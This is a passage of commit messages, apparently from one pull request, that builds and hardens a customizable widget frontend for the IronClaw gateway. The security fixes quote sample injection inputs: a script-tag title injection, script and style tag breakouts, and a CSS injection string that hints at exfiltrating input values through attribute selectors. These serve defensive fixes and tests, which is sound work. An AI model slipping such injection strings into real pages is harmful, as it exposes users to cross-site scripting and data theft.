Widgets are stored in workspace at frontend/widgets/{id}/ and served via
the API. Layout config is stored at frontend/layout.json. The agent can
create/edit both using existing memory_write/memory_read tools.

Gateway handlers now reference ironclaw_frontend::assets constants instead
of include_str!() with local paths, completing the separation.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: address CI failures — license, rust-version, formatting, manifest warnings

- Add license = "MIT OR Apache-2.0" to ironclaw_frontend Cargo.toml (cargo-deny)
- Fix rust-version to 1.92 to match other crates
- Log warning for invalid widget manifests instead of silent skip
- Run cargo fmt across all files

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(frontend): structured data cards + chat renderer API for rich message rendering

Agent responses containing JSON/structured data (like mission results,
status objects) now render as styled cards with labeled fields, status
badges, and monospaced IDs instead of raw text.

Built-in rendering:
- Detects inline JSON objects (including Python-style single quotes)
- Renders as data cards with key-value rows
- Status/state fields get colored badges (success/error/pending)
- UUIDs rendered in monospace

Extensible via widgets:
- IronClaw.registerChatRenderer({ id, match, render, priority })
- First matching renderer wins (priority ordering)
- Renderer gets the content element to mutate in place

Also adds ChatRenderer variant to WidgetSlot enum.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(frontend): hash-based URL navigation for page refresh persistence

Navigation state is now encoded in window.location.hash so refreshing
the page (or sharing a URL) restores the current view:

  #/chat                   → chat tab, assistant thread
  #/chat/{threadId}        → specific conversation
  #/memory/{path/to/file}  → memory browser with file open
  #/jobs/{jobId}           → job detail view
  #/routines/{id}          → routine detail view
  #/settings/{subtab}      → settings sub-tab (extensions, etc.)
  #/logs                   → logs tab

Hooked into all navigation functions: switchTab, switchThread,
switchToAssistant, createNewThread, readMemoryFile, openJobDetail,
closeJobDetail, openRoutineDetail, closeRoutineDetail,
switchSettingsSubtab.

Thread restore is deferred until loadThreads() completes (async),
then the pending thread ID is matched against the loaded thread list.

Browser back/forward buttons work via hashchange listener.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(frontend): auto-open README.md when first visiting Memory tab

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(frontend): preserve URL hash across page refresh

Two bugs caused the hash to reset on Cmd+R:
1. Auth URL cleanup (replaceState) stripped the hash fragment —
   now preserves it via cleaned.hash
2. restoreFromHash() called switchTab() which called updateHash()
   overwriting the full hash before the detail was restored —
   now suppresses hash updates during the entire restore sequence

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(frontend): seed frontend/README.md with customization guide for agent

The agent didn't know it could customize the frontend via workspace writes.
Now seeds frontend/README.md on first boot with a guide covering:
- Layout config (branding, colors, tab order) via frontend/layout.json
- Custom CSS via frontend/custom.css with common variable names
- Widget creation (manifest + index.js + style.css)
- API endpoints

Also seeds frontend/.config with skip_indexing: true so frontend assets
aren't chunked/embedded for search.

When a user says "change the color scheme to red", the agent can now
discover frontend/README.md via memory_tree, read the guide, and write
the appropriate layout.json or custom.css.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(frontend): wire workspace-aware serving for index.html and style.css

The index_handler and css_handler now read from workspace to apply
frontend customizations on page load:

- index_handler: reads frontend/layout.json, discovers widgets in
  frontend/widgets/*, reads frontend/custom.css, then calls
  assemble_index() to inject branding colors, layout config,
  widget scripts, and custom CSS into the base HTML.
  Falls back to embedded HTML if no customizations exist.

- css_handler: appends frontend/custom.css from workspace after
  the embedded base stylesheet.

This completes the end-to-end flow:
  Agent writes frontend/layout.json → user refreshes → sees changes

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(frontend): wire up remaining widget system gaps

Audit-driven fixes for the widget extension system:

1. Widget tab panel ID: panels now get id="tab-{widgetId}" so
   switchTab() can find and activate them

2. Widget JS auth: inline widget JS in assembled HTML instead of
   <script src> to protected endpoint (browser script tags can't
   send Authorization headers)

3. Layout config: fully implement tab ordering, default_tab,
   chat.suggestions, chat.image_upload application

4. SSE event forwarding: wrap EventSource.addEventListener to
   intercept all named events and dispatch to widget subscribers
   via IronClaw.api._dispatch()

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(frontend): XSS prevention, widget queue drain, code-block false positives

Security (2 XSS fixes):
1. HTML-escape branding title in assemble_index() to prevent
   <script>alert(1)</script> injection via layout.json
2. Escape </script> in inlined widget JS to prevent script tag
   breakout — uses <\/script> replacement
3. Escape widget IDs in HTML attributes via escape_html_attr()

Correctness:
4. Drain _widgetInitQueue after DOM is ready — widgets registered
   before tab-bar exists now mount correctly instead of silently
   failing
5. Skip inline <code> elements in upgradeInlineJson to prevent
   false-positive JSON card rendering on code spans like
   <code>{key: value}</code>
6. Document scope_css limitation with nested @media rules

Tests (13 new):
- XSS: title injection escaped, widget JS </script> breakout escaped,
  widget ID attribute escaped
- Edge cases: escape_html basic, escape_html_attr quotes, missing
  head/body tags, empty widget JS, whitespace-only custom CSS skipped
- Widget: at-rule not prefixed, declarations preserved, special chars
  in widget ID, all slot variants round-trip, minimal manifest

[skip-regression-check]

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* style: fix clippy — collapsible if, while_let_on_iterator

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(ci): resolve frontend clippy and formatting failures

* fix(frontend): address PR review — XSS, scope_css, cache, dedup

Security (3 XSS gaps):
1. Layout JSON injected into <script>window.__IRONCLAW_LAYOUT__</script>
   is now run through escape_tag_close() — serde_json does not escape `<`
   or `/`, so a branding title containing `</script>` previously broke
   out of the script tag. Case-insensitive, UTF-8 safe.
2. Widget CSS and custom CSS injected into <style> tags are now escaped
   the same way against `</style>` breakouts.
3. New escape_tag_close() helper handles `</script`/`</style` uniformly
   (case-insensitive with tail preserved, via char-boundary walk).

Correctness:
4. scope_css now tracks brace depth via a stack that distinguishes rule
   lists from declaration blocks. Selectors nested inside @media,
   @supports, @container, @layer, @document, @scope are recursively
   scoped. @keyframes/@font-face/@page bodies pass through opaque so
   inner keyframe selectors (0%, 100%) are not prefixed. The old
   single-bool parser produced unbalanced output on any nested rule.
5. WidgetInstanceConfig.enabled now defaults to true (via serde_default
   + manual Default impl). A layout entry that omits `enabled` while
   setting `config` no longer silently disables the widget.
6. build_frontend_html short-circuit replaced with a
   layout_has_customizations() helper covering all branding/tabs/chat
   fields. The old boolean missed subtitle, logo_url, favicon_url,
   default_tab, image_upload.
7. Custom CSS is now served only via /style.css (css_handler). Removed
   from FrontendBundle injection to prevent double-application.
8. Dead pub index_handler/css_handler/js_handler in
   handlers/static_files.rs removed — routes use private handlers in
   server.rs that need GatewayState.
9. Widget file path validation is now component-based via
   is_safe_segment / is_safe_relative_path. Rejects `.`, `..`, empty,
   `/`, `\`, NUL in any component, plus leading `/`. MIME detection is
   case-insensitive and adds .mjs / .map.
10. Layout and widget-manifest parse errors now log tracing::warn!
    instead of silently falling back.

Extension system follow-ups:
11. Extracted shared widget-loading helpers (load_widget_manifests,
    load_resolved_widgets, read_widget_manifest) in handlers/frontend.rs.
    frontend_widgets_handler and build_frontend_html both delegate, so
    widget discovery exists in exactly one place.
12. New FrontendHtmlCache in GatewayState. Cache key is derived from the
    updated_at of frontend/layout.json and the frontend/widgets/
    directory (max child mtime) via a single list("frontend/") call.
    A cache hit skips reading every widget manifest/JS/CSS per request.
    Edits invalidate naturally because list() sees the newer timestamp.
    Cache survives rebuild_state() by cloning the Arc.
13. upgradeInlineJson rewritten without the nested-quantifier regex. New
    _findJsonCandidates does a linear bracket scan that respects string
    literals and fast-skips <code>/<pre> regions. Three hard caps bound
    worst-case work (MAX_PARA_LEN=20000, MAX_SCAN=5000,
    MAX_CANDIDATES=32), eliminating the catastrophic-backtracking risk.

Tests (29 new):
- bundle.rs: 5 — layout JSON / widget CSS / custom CSS <script>/<style>
  breakouts, escape_tag_close case-insensitive, multi-byte safety
- widget.rs: 5 — @media inner selector scoped, nested @supports+@media,
  @keyframes passthrough, sibling rules in @media, complex mix brace
  balance
- layout.rs: 3 — enabled defaults true, Default impl enabled,
  explicit false respected
- handlers/frontend.rs: 4 — segment allows/rejects, relative path
  allows/rejects (traversal, backslash, encoded separators)

Quality gate:
- cargo fmt clean
- cargo clippy --all --benches --tests --examples --all-features →
  zero warnings
- cargo test --lib -p ironclaw_frontend -p ironclaw → 4171 main +
  43 frontend tests pass

[skip-regression-check]

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: post-merge — PairingStore::new_noop, CLI snapshot, docs

Merge of origin/staging surfaced three small follow-ups:

1. src/channels/wasm/wrapper.rs — PairingStore::new() signature changed
   in staging to take (db, cache). Switch the test call site to
   PairingStore::new_noop() to match other tests in the file.

2. src/cli/snapshots/..long_help_output_without_import.snap — accept
   the new snapshot. Clap's render_long_help for --auto-approve now
   emits an indented blank line between the short and long description;
   this test was already failing on staging tip (see Staging CI run
   24021660555) so the snapshot update was needed regardless of this PR.

3. src/workspace/seeds/FRONTEND.md — address new copilot comments:
   - Placeholder is `{id}` (matches API path segment and manifest id
     field), not `{name}`.
   - Only `slot: "tab"` is actually mounted by the browser runtime.
     Trim the slot list to what's implemented and mention
     IronClaw.registerChatRenderer() for inline rendering. The extra
     WidgetSlot variants stay in the Rust API for forward compatibility
     but are no longer advertised to users until mounting is wired.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* refactor: rename ironclaw_frontend → ironclaw_gateway, .system/gateway/ workspace

Two coupled renames to align frontend assets with the broader `.system/`
namespace introduced by other in-progress work:

1. Workspace folder: `frontend/` → `.system/gateway/`
   - layout.json, custom.css, widgets/{id}/, README.md, .config all
     move under `.system/gateway/`
   - LAYOUT_PATH and WIDGETS_DIR are now constants in the handler so a
     future move is a one-line change
   - is_config_path test updated to use the new path
   - FRONTEND.md seed rewritten to point at `.system/gateway/`
   - Cache key doc comments updated to match
   - No legacy or migration shim — this never shipped to prod

2. Crate: `ironclaw_frontend` → `ironclaw_gateway`
   - Matches how the surrounding subsystem is called (`channels/web` is
     "the gateway"). Cleaner mental model: workspace folder, crate name,
     and module name all align.
   - Directory renamed via `git mv` so history is preserved.
   - Cargo.toml workspace member + dependency updated; package name
     updated; description tweaked to "gateway frontend assets".
   - All `use ironclaw_frontend::` imports rewritten in server.rs and
     handlers/frontend.rs.
   - Doctest in widget.rs updated to use the new crate name.
   - Cargo.lock regenerated.

The HTTP API paths stay as `/api/frontend/*` since they're a public
surface; only the internal workspace path and crate name moved.

Quality gate:
- cargo fmt clean
- cargo clippy --all --benches --tests --examples --all-features →
  zero warnings
- cargo test -p ironclaw_gateway → 43 unit + 1 doctest pass
- cargo test --lib -p ironclaw → 4228 pass (8 unrelated IPv6/DNS
  validation failures, also failing on clean post-merge baseline)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): per-request CSP nonce for inlined widget scripts

Copilot review caught that `assemble_index()` injects two kinds of inline
`<script>` blocks (the layout-config script and per-widget module scripts),
but the gateway's CSP sets `script-src 'self' …CDNs…` with no
`'unsafe-inline'` and no nonce — so the browser silently blocks every
injected script the moment any customization is enabled. The widget
runtime would never execute on a customized index page.

Fix uses a per-request CSP nonce (W3C standard pattern):

- `crates/ironclaw_gateway/src/bundle.rs`
  - New `NONCE_PLACEHOLDER` sentinel constant, re-exported from the crate root
  - `assemble_index()` stamps `nonce="__IRONCLAW_CSP_NONCE__"` on every
    injected `<script>` tag (both the layout-config script and each
    widget's module script)
  - Inline `<style>` blocks deliberately do NOT carry a nonce — the
    gateway's CSP allows `'unsafe-inline'` for `style-src`, so adding
    one would be dead weight; pinned with a regression test
  - Three new tests verify the placeholder appears on layout + widget
    scripts and is absent on widget styles

- `src/channels/web/server.rs`
  - Static CSP layer now reads from a single `BASE_CSP` constant so the
    static and per-response variants stay in lock-step
  - New `build_csp_with_nonce(nonce)` produces the same CSP with
    `'nonce-{nonce}'` added to script-src, preserving the explicit CDN
    list and the strict `style-src 'self' 'unsafe-inline' …` policy
  - New `generate_csp_nonce()` returns 16 random bytes hex-encoded via
    OsRng — same primitive `tokens_create_handler` already uses
  - `index_handler` now returns `Response` (not `impl IntoResponse`) so
    it can branch:
    - Workspace has no customizations → serve embedded `INDEX_HTML`
      unchanged; the static CSP layer applies (no inline scripts to
      authorize anyway)
    - Workspace has customizations → generate fresh nonce, replace
      placeholder in cached HTML, and emit a per-response
      `Content-Security-Policy` header with the nonce. Setting the
      header here suppresses the global `if_not_present` layer for this
      response only.
  - Two new unit tests pin the nonce-source position in script-src and
    the format/uniqueness of `generate_csp_nonce()`

The HTML cache still works because the cached HTML contains the
placeholder (not the actual nonce); per-request substitution preserves
caching while the browser still sees a unique nonce on every page load.

Quality gate:
- cargo fmt clean
- cargo clippy --all --benches --tests --examples --all-features →
  zero warnings
- cargo test -p ironclaw_gateway → 46 pass (+3 nonce tests)
- cargo test --lib -p ironclaw → 4238 pass (+2 CSP tests)

Refs: PR #1725 review by copilot-pull-request-reviewer

[skip-regression-check]

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): wire ko.js asset through ironclaw_gateway::assets

The merge of staging brought in a Korean i18n pack referenced via
include_str!("static/i18n/ko.js") in src/channels/web/server.rs.
After the gateway extraction the static/ directory moved into
crates/ironclaw_gateway/static/, so the legacy include_str! path
no longer resolved. Add I18N_KO_JS to ironclaw_gateway::assets and
make the i18n_ko_handler reference it like the other language packs.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* test(e2e): add Playwright coverage for chat-driven frontend customization

Adds two end-to-end scenarios for the widget extension system shipped in
PR #1725, both driven by talking to the agent in chat:

1. **Tab bar to left side panel.** The user asks the agent to move the
   tab bar; the mock LLM emits a `memory_write` tool call writing
   `.system/gateway/custom.css`, and after a reload the test asserts the
   served stylesheet contains the overlay, the computed flex-direction
   of `.tab-bar` is `column`, and the bar is now taller than it is wide.

2. **Workspace-data widget.** The user asks the agent to create a
   "Skills" widget that renders workspace skills. Two chat turns write
   `.system/gateway/widgets/skills-viewer/manifest.json` and `index.js`
   into the workspace. After a reload the test verifies the new tab
   button appears in `.tab-bar`, switches to it, waits for the widget's
   `data-testid="skills-viewer-root"` to mount, and asserts the widget
   actually fetched `/api/skills` (no `skills-viewer-error` marker) and
   that the panel carries the `data-widget="skills-viewer"` attribute
   the gateway runtime stamps for CSS isolation.

Both tests share a `clean_customizations` fixture that wipes the
workspace overlay files before and after each run so the session-scoped
gateway server stays isolated across tests in the file (`memory_write`
treats empty content as effectively cleared, and the gateway skips
empty / unparseable widget files silently).

Supporting changes:

- **mock_llm.py**: three new `TOOL_CALL_PATTERNS` (`customize: move
  tab bar to left`, `customize: create skills viewer manifest`,
  `customize: install skills viewer code`) that emit one
  `memory_write` call per turn — the existing one-tool-per-response
  shape is preserved.
- **app.js (`_addWidgetTab`)**: fix a latent bug where widget tabs
  would be queued forever because the function looked for a
  `.tab-content` / `#tab-content` element that the gateway HTML never
  ships. The built-in tab panels live as siblings of `.tab-bar` inside
  `#app`, so we now resolve the parent off the first existing
  `.tab-panel` (with `#app` as a final fallback). Without this fix the
  Skills widget tab never mounts and the second scenario can't pass.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* test(e2e): support multi tool calls per response in mock_llm

The mock LLM previously emitted at most one tool call per assistant
turn. That shape silently bypasses the v2 engine and CodeAct dispatch
paths, where a single response can fan out into several parallel tool
calls (or several Python helper invocations from one script). Tests
written against that constraint were either contorted into multiple
chat turns or quietly failed to cover multi-call regressions.

Changes:

- ``TOOL_CALL_PATTERNS`` args functions may now return ``list[dict]``
  instead of a single ``dict``. Each item is its own
  ``{"tool_name", "arguments"}`` pair, so one trigger can mix several
  tools in one response. ``_normalize_tool_calls`` always wraps the
  return value into a list so the dispatcher stays shape-agnostic.

- ``match_tool_call`` returns ``list[dict] | None``.

- ``_tool_call_response`` and ``_stream_tool_call`` now accept either a
  single dict (legacy callers) or a list. The streaming path emits
  per-tool-call header + arguments chunks with distinct ``index``
  values, exercising clients' per-index merging logic the same way real
  providers force them to.

- ``_find_tool_results`` collects every fresh ``role: tool`` message
  after the most recent user turn (not just the first), and the
  chat-completion summary path renders a multi-line acknowledgment
  when more than one tool ran in a single turn. The single-result
  helper is kept as a thin shim for the special-response path.

- The PR #1725 customization scenario is consolidated: instead of
  three separate triggers (one memory_write each), the
  ``customize: install skills viewer widget`` trigger now emits *both*
  the manifest and ``index.js`` writes in one assistant turn. The
  ``customize: move tab bar to left`` trigger stays single-call to
  cover the legacy code path. The Playwright test in
  ``test_widget_customization.py`` is updated to a single chat turn
  for the widget install — if the v2 engine ever drops the second
  parallel call, the test will fail because the new tab can't mount
  without both files.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): address PR #1725 review feedback

Four issues raised in the 2026-04-07 review pass:

1. **Widget id / directory mismatch** (`src/channels/web/handlers/frontend.rs`).
   `read_widget_manifest` now rejects widgets whose `manifest.id` does
   not match the on-disk directory name. The loader uses the directory
   name to compute file paths (`{WIDGETS_DIR}{dir}/index.js`) while the
   layout-config gating and the public
   `/api/frontend/widget/{id}/{*file}` endpoint key off `manifest.id`.
   When those drift, code can be mounted from one folder under a
   different id and the file API silently 404s — a correctness footgun
   for widget authors and a path-confusion attack surface for the
   serving handler. Fix lives in the shared helper so both
   `load_resolved_widgets` and `load_widget_manifests` get it. Adds
   regression tests for both the rejection and the matching path.

2/3. **`memory_write` doc examples used the wrong parameter name**
   (`src/workspace/seeds/FRONTEND.md`). The seeded customization guide
   showed `memory_write path=".system/gateway/..."`, but the actual tool
   parameter is `target` (`src/tools/builtin/memory.rs`). As written the
   examples wouldn't work if copy-pasted into a tool call. Both
   examples (layout.json + custom.css) updated to `target=`.

4. **`css_handler` allocated on the hot path** (`src/channels/web/server.rs`).
   The handler always called `assets::STYLE_CSS.to_string()` in the
   no-overlay branches, copying the entire embedded stylesheet on
   every request. Switched the local to `Cow<'static, str>` so the
   common path borrows the static string and only the overlay branch
   pays for an owned `format!`.

Quality gate:
- `cargo fmt` clean
- `cargo clippy --no-default-features --features libsql --tests` zero warnings
- `cargo test --no-default-features --features libsql --lib channels::web::handlers::frontend` — 6 passed (4 existing + 2 new regression tests)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): address PR #1725 paranoid-architect review

Five issues raised in the 2026-04-07 review pass:

1. **High — `</style>` breakout XSS in branding CSS-vars injection**
   (`crates/ironclaw_gateway/src/bundle.rs`). Every other inline injection
   point in `assemble_index()` runs through `escape_tag_close`, but the
   branding `<style>` block formatted directly. A hostile color value
   containing `</style>` could close the tag early and inject HTML. Now
   wraps `css_vars` in `escape_tag_close(&css_vars, "</style")` for
   defense in depth, with a regression test in
   `test_assemble_index_branding_style_breakout_escaped`.

2. **Medium — CSS property injection via unvalidated branding colors**
   (`crates/ironclaw_gateway/src/layout.rs`). `to_css_vars()` interpolated
   `primary` / `accent` strings raw into `--color-primary: {};`, letting
   a hostile `layout.json` break out of the `:root {}` block (e.g.
   `red; } .chat-input[value^="s"] { background: url(...) }`). Added
   `is_safe_css_color()` validator that accepts hex literals, modern
   functional notation including `rgb(0 0 0 / 50%)`, and bare named
   colors, while rejecting `;`, `{}`, `<>`, quotes, backslash, `*`
   (handles both `/*` and `*/` comment markers), `url(...)`, and unknown
   functions. `to_css_vars()` silently drops invalid values so the rest
   of the branding config still applies. Six new unit tests cover the
   accepted forms, the injection vectors, and the `to_css_vars` drop.

3. **Medium — CSP policy duplication risks silent drift**
   (`src/channels/web/server.rs`). `BASE_CSP` and `build_csp_with_nonce`
   re-hardcoded every directive independently, so adding a `connect-src`
   to one would silently leave the other on the old policy. Extracted
   per-directive constants (`STYLE_SRC`, `FONT_SRC`, `CONNECT_SRC`,
   `IMG_SRC`, `FRAME_SRC`, `FORM_ACTION`) and built both flavors via a
   single `build_csp(nonce: Option<&str>)` helper. `BASE_CSP_HEADER` is
   now a `LazyLock<HeaderValue>` (with a safe minimal fallback to honor
   the no-`.expect()` rule on the request path). Added two regression
   tests: `test_base_and_nonce_csp_agree_outside_script_src` strips the
   `script-src` directive from both flavors and asserts byte equality,
   and `test_base_csp_header_matches_build_csp_none` locks the lazy
   header to `build_csp(None)`.

4. **Medium — `_wipe_customizations` ignored HTTP status**
   (`tests/e2e/scenarios/test_widget_customization.py`). The cleanup
   posts now assert `status_code == 200` with `resp.text` in the
   message, so an auth/server failure surfaces immediately instead of
   bleeding leftover workspace state into the next test.

5. **Drive-by — pre-existing flake in `test_telegram_token_colon_preserved
   _in_validation_url`** (`src/extensions/manager.rs`). The test reads
   `IRONCLAW_TEST_TELEGRAM_API_BASE_URL` via `telegram_bot_api_url`
   without taking the `lock_env()` mutex, so when a parallel test holds
   the override the read races and the assertion sees
   `http://127.0.0.1:.../bot…` instead of `https://api.telegram.org/`.
   The new tests in this PR changed scheduling enough to surface the
   race on every run. Fixed by acquiring the same `ScopedEnvVar` lock
   and clearing the override inside the test, making it deterministic.

Quality gate:
- `cargo fmt` clean
- `cargo clippy --no-default-features --features libsql --tests` zero warnings
- `cargo test --no-default-features --features libsql --lib` — 4284 passed
- `cargo test -p ironclaw_gateway` — 50 unit + 1 doctest passed (was 46)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* ci: nudge workflows for b88d4554 (Actions trigger missed)

* fix(gateway): address PR #1725 zmanian review

Five items raised in zmanian's 2026-04-08 review (approved). None are
blockers; this sweep avoids carrying them as follow-up debt.

1. **Document widget trust model**
   (`src/workspace/seeds/FRONTEND.md`). New "Security model" section
   spells out that widgets run with full session authority via
   `IronClaw.api.fetch`, share the same DOM as the built-in tabs, and
   are *not* sandboxed at the JS layer. The trust boundary lives one
   layer up: anything that can `memory_write` a widget file already
   has agent authority. Operators who want stricter isolation should
   mount untrusted UI in an `<iframe sandbox>` from a trusted widget.

2. **Extract shared `read_layout_config` helper**
   (`src/channels/web/handlers/frontend.rs`,
    `src/channels/web/server.rs`). Both
   `frontend_layout_handler` and `build_frontend_html` had identical
   read-parse-fallback bodies — the kind of drift trap zmanian flagged.
   Hoisted the helper into `handlers/frontend.rs` as
   `pub async fn read_layout_config`; `server.rs` deletes its private
   copy and imports the shared one. The single source of truth means a
   future change to the warning text or fallback semantics lands once.

3. **Escape `def.id` and `e.message` in `_addWidgetTab` error path**
   (`crates/ironclaw_gateway/static/app.js`). The catch block built
   the failure banner via `innerHTML` with raw interpolation. CSP
   blocks the script vector, but every other innerHTML write in this
   file routes user-controlled strings through `escapeHtml()`, and an
   inconsistent escape discipline is exactly the kind of regression
   future readers shouldn't have to re-litigate. Now wraps both
   `def.id` and `String(e?.message ?? e)` in `escapeHtml`.

4. **Gate `upgradeInlineJson` behind opt-in flag**
   (`crates/ironclaw_gateway/src/layout.rs`,
    `crates/ironclaw_gateway/static/app.js`,
    `src/channels/web/server.rs`). The bracket-counting heuristic
   pattern-matches any balanced `{...}` in rendered markdown — prose
   like `"set the value to {x: 1, y: 2}"` gets mangled into a styled
   data card. New `ChatConfig::upgrade_inline_json: Option<bool>`
   defaults to `None` (off); operators that pipe structured data
   through chat can flip it on via `.system/gateway/layout.json`.
   `app.js` checks `window.__IRONCLAW_LAYOUT__.chat.upgrade_inline_json
   === true` before invoking the rewrite. Also added the field to
   `layout_has_customizations` so a layout that only sets this flag
   still triggers the customized HTML path. Two new `ironclaw_gateway`
   tests pin the default-off serde shape and the explicit-true
   round-trip (omitted field must not appear in serialized output).

5. **ETag cache-busting on `/style.css`**
   (`src/channels/web/server.rs`). Operators editing `custom.css` had
   to ask users to hard-refresh because the response carried only
   `Cache-Control: no-cache` with no validator. Added `css_etag()`
   producing a strong `"sha256-…"` validator over the assembled body
   (16 hex chars / 64 bits — plenty for content addressing on a
   single-tenant CSS payload). `css_handler` now extracts the request
   `HeaderMap`, honors `If-None-Match` (exact match or `*`) with a
   `304 Not Modified` + empty body, and otherwise emits `ETag` on the
   200 response. The `Cache-Control: no-cache` stays so the browser
   always revalidates — together with the ETag this gives "fast 304"
   semantics rather than a stale `max-age` window where edits don't
   show up. Four new tests in `server.rs::tests`:
   - `test_css_etag_is_strong_validator_format` (no `W/`, quoted,
     ASCII)
   - `test_css_etag_changes_when_body_changes` (single-byte mutation
     invalidates)
   - `test_css_etag_stable_for_identical_body` (cache hit reproducible)
   - `test_css_handler_returns_etag_and_serves_304_on_match` (full
     handler round-trip via `tower::ServiceExt::oneshot`: 200 → ETag →
     304 on match → 200 on stale validator)

Quality gate:
- `cargo fmt` clean
- `cargo clippy --no-default-features --features libsql --tests` zero
  warnings
- `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed
  (was 50; +2 for the new chat-config flag tests)
- `cargo test --no-default-features --features libsql --lib channels::web`
  — 334 passed (includes the 4 new ETag tests, the existing widget
  loader tests, and the shared `read_layout_config` callers on both
  ends)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): land deferred items from PR #1725 paranoid-architect summary

Both items the previous sweep (1c361d42) explicitly deferred. Closing
the loop so they don't get lost as follow-up debt.

1. **`assemble_index` no longer silently drops layout serialization
   failures** (`crates/ironclaw_gateway/src/bundle.rs`). The
   `if let Ok(layout_json) = serde_json::to_string(&bundle.layout)`
   shortcut would discard the entire `window.__IRONCLAW_LAYOUT__`
   injection on error and the customized HTML would ship without any
   branding/tab/chat customizations applied — and the IIFE in `app.js`
   would no-op them all without leaving a trace. The branch is
   unreachable on well-typed input (`LayoutConfig` and every nested
   type derive `Serialize` cleanly), but a future field that adds a
   serialization-fallible type — `serde_json::Value`, a custom
   `Serialize` impl, an `i128` — would silently regress the entire
   customization path. Now the error branch logs `tracing::warn!` with
   the serde error so the failure is observable.

   Required pulling `tracing = "0.1"` into `crates/ironclaw_gateway/`
   (already in the workspace dep set; the gateway crate just hadn't
   needed it yet).

2. **`default_tab` is applied after the widget queue drains**
   (`crates/ironclaw_gateway/static/app.js`). The layout-config IIFE
   used to call `switchTab(layout.tabs.default_tab)` from inside the
   same block that handled branding/tabs/chat. That block runs *before*
   `_widgetInitQueue.drain` mounts widget panels, so any widget-provided
   tab id (e.g. `default_tab: "dashboard"` where `dashboard` comes from
   a registered widget) silently no-ops — `switchTab` looks up
   `#tab-dashboard`, finds nothing, and the user lands on the default
   built-in tab instead. The setting appeared broken to anyone who
   tried it.

   Fix: hoist the `default_tab` switch out of the layout IIFE and place
   it after the `_widgetInitQueue` drain. Hash navigation still wins
   (so `#chat` deep-links survive a customized `default_tab`), and the
   block only runs when a layout was actually injected. Left an
   inline `NOTE` at the original site so a future contributor doesn't
   "helpfully" move it back inside the IIFE.

Quality gate:
- `cargo fmt` clean
- `cargo clippy --no-default-features --features libsql --tests` zero
  warnings
- `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed
  (no count change; #1 is a logging path with no new test surface and
  #2 is JS-side)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* chore: update Cargo.lock for ironclaw_gateway tracing dep

Forgotten in 8edca735, which added `tracing = "0.1"` to
`crates/ironclaw_gateway/Cargo.toml` to support the new
`tracing::warn!` on layout serialization failure in `assemble_index`.
The `tracing` crate is already pulled in transitively elsewhere in the
workspace, so this is purely a manifest-side dependency declaration.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): align layout selectors with real DOM (PR #1725 Copilot review)

Two "low confidence" findings from the latest Copilot review pass that
are both real bugs — the affected layout flags silently no-opped
because the JS selectors didn't match the elements actually rendered
by `static/index.html`.

1. **`tabs.hidden` only matched widget tabs, not built-ins.**
   `_addWidgetTab` creates buttons with `class="tab-btn"`, but the
   built-in tab `<button>`s in `index.html:157-162` are plain
   `<button data-tab="chat">` etc. with no class. The previous
   selector — `.tab-btn[data-tab="…"]` — therefore only matched
   widget-injected buttons, so a layout like
   `tabs.hidden: ["routines"]` (a built-in) silently did nothing.
   Switched to `.tab-bar button[data-tab="…"]`, which matches both
   variants while still scoping the lookup to the tab bar (so a stray
   `<button data-tab>` elsewhere on the page can't be hidden by
   accident).

2. **`chat.image_upload === false` targeted a non-existent element.**
   The handler tried to hide `#image-upload-btn`, but the actual
   composer in `index.html` uses `#attach-btn` (the visible paperclip)
   and `#image-file-input` (the hidden file input). The flag therefore
   never disabled image uploads. Now hides `#attach-btn` AND sets
   `#image-file-input.disabled = true`, so a programmatic
   `document.getElementById('image-file-input').click()` from a
   widget or extension can't bypass the operator's intent — the
   capability is actually gone, not just the chrome.

Both bugs share the same root cause: the layout-config IIFE was
written against a hypothetical DOM rather than the one
`index.html` ships, and there's no e2e test that exercises a layout
with `tabs.hidden` set to a built-in or `chat.image_upload: false`,
so the regression slid through. (A follow-up Playwright scenario
would catch the next instance of this — tracking separately rather
than expanding the scope of this PR.)

Quality gate:
- `cargo fmt` clean
- `cargo clippy -p ironclaw_gateway --tests` zero warnings
- `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed
  (no count change; both fixes are JS-side)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* test(e2e): regression test for layout selector / DOM drift (PR #1725)

The two `app.js` selector bugs Copilot caught in PR #1725 review pass
4072914579 (`tabs.hidden` only matched widget-injected `.tab-btn`
buttons rather than built-in plain `<button data-tab>`s, and
`chat.image_upload === false` targeted a non-existent
`#image-upload-btn` instead of `#attach-btn` / `#image-file-input`)
both slid through code review for the same root reason: there was no
e2e test that loaded a customized layout and asked the browser whether
the flags actually took effect. The unit tests on the Rust side
verified `LayoutConfig` round-trips, and the existing widget-tab test
